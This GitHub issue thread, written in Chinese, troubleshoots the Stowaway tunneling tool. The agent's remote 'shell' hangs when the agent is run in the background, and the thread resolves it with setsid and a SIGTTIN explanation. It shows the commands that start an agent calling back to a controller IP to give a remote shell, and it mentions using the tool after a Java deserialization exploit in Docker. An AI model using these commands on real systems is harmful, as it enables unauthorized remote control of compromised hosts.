### ISSUE TITLE
当agent以后台进程运行时，执行shell命令会导致一直等待

### ISSUE THREAD

**Issue by r0ck3rt** [ph4ntonn/Stowaway#13]
admin端：admin: ./stowaway_admin -l 9999 -s 123
agent端： ./stowaway_agent -s 123 -c 192.168.1.102:9999 &
(admin) >> use 0
(node 0) >> shell
[*] Waiting for response.....

如果是手工复现，在agent端手动运行fg命令后可以正常，但在实际的环境中，如Docker容器中java 反序列化场景命令执行，则会一直卡住，没办法解决，请问这种情况要如何处理。

**Comment by ph4ntonn** [comment]
你好～
这个问题我在第一版时就有遇见，google了很久，发现如果你以后台方式启动stowaway，并且当前stowaway的父进程为bash时，fork出的子bash将无法拿到输入/输出，具体的原因我之后也没有查看bash具体实现，故而不能告诉你准确的原因，当然如果你知道，也请你分享给我，一起共同进步～
至于暂时的缓解办法，可以使用setsid命令，将stowaway脱离bash即可

**Comment by r0ck3rt** [comment]
查了一些资料，agent需要控制当前的pts,而在后台运行时并不能控制pts的输入，并且会被SIGTTIN中断而进入suspended (tty input)状态，如果使用fg是可以把pts的input权限交给进程，同时进程的状态也将恢复。
https://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap11.html#tag_11_01_04
setsid复制了当前session,并且控制了当前pts的input,这样确实可以缓解。

**Comment by ph4ntonn** [comment]
感谢分享～我都有点忘了我当时咋查的资料了(笑)
如果方便的话，可以加我的vx(在我的主页上)，以后可以一起讨论问题～
再次感谢你的issue
